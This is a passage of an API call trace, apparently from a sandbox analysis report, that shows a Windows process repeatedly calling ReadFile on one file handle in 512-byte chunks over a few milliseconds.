lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.756] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, 
lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.757] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile 
(in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 
[0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.758] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, 
lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.759] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, 
lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.760] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: 
lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, 
lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.761] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.762] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.763] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, 
lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.764] ReadFile 
